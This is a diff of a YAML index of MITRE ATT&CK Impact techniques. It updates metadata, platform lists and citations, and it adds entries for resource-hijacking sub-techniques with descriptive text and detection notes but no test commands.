         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -57275,7 +58042,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -57302,12 +58069,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -57340,7 +58173,7 @@ impact:
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -57350,10 +58183,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -57416,7 +58248,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -57457,7 +58288,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -57478,9 +58309,157 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests: []
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -57533,11 +58512,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -57560,6 +58538,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -57577,9 +58556,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -57605,9 +58585,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests: []
   T1486:
@@ -57694,7 +58673,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -57718,12 +58697,11 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests: []
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -57742,7 +58720,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -57759,18 +58736,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -57794,8 +58766,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -57815,33 +58787,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -57852,7 +58813,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -57869,8 +58830,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -57889,99 +58853,73 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests: []
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -57990,7 +58928,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58016,9 +58954,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -58074,55 +59013,11 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests: []
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
